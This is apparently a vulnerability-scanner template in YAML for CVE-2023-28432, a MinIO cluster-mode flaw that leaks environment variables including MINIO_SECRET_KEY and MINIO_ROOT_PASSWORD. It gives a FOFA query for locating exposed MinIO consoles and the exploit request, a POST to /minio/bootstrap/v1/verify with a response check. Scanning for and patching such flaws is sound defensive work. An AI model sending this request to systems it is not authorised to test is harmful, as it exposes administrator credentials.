product: MinIO
vName: MinIO集群模式信息泄露
type: 信息泄漏
vID:
  - CVE-2023-28432
level: 3
vDesc: 在集群模式中，MinIO的某些接口会因为信息处理不当而返回会返回所有环境变量，包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD，导致敏感信息泄露。使用分布式部署的所有用户都会受到影响。
version: RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
note: ''
search:
  FOFA: app="MinIO-Console"
protocol: http
link: https://cloud.tencent.com/developer/article/2315008
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /minio/bootstrap/v1/verify
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '{"MinioEndpoints"'
            logic: and